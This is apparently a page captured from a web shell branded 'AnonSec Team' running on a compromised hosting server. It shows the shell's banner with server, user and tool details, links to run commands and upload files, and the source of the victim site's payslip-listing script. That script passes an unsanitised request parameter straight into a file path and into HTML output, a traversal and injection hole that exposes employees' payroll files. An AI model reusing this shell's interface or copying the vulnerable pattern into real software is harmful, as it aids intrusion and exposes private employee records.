AnonSec Team
Server IP : 10.128.40.6  /  Your IP : 216.73.216.233
Web Server : Apache
System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : logmcpe ( 111175)
PHP Version : 7.3.33
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/logmcpe/www/MC/documents/../

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/logmcpe/www/MC/documents/../cag.php
<?php
include 'code/init.php' ;
print_header(array(),'','style="margin:5px 10px 5px 10px; padding:5px 10px 5px 10px; border:solid 1px #9E9E9E;"') ;
define ('MALADIE', 2) ;
define ('PERSO', 6) ;
$interv = @$_GET['interv_id'] ;
?>
<div class="onglet_dotted">
<h1>Fiches de paye disponibles</h1>
<?php
	if (is_dir("paye/$interv"))
	{
		$dir = opendir("paye/$interv");
		while($fic = readdir($dir))
			if (!is_dir($fic) && preg_match('/^(\d{8})(\d{8})\.pdf$/i', $fic, $mask))
			{
?>
<a href="paye/<?=$interv?>/<?=$mask[0]?>">Fiche de paye du <?=ucwords(int2date($mask[1], 'd F Y'))?> au <?=ucwords(int2date($mask[2], 'd F Y'))?></a><br>
<?php
			}
	}
?>
</div>
</body>
</html>

AnonSec - 2021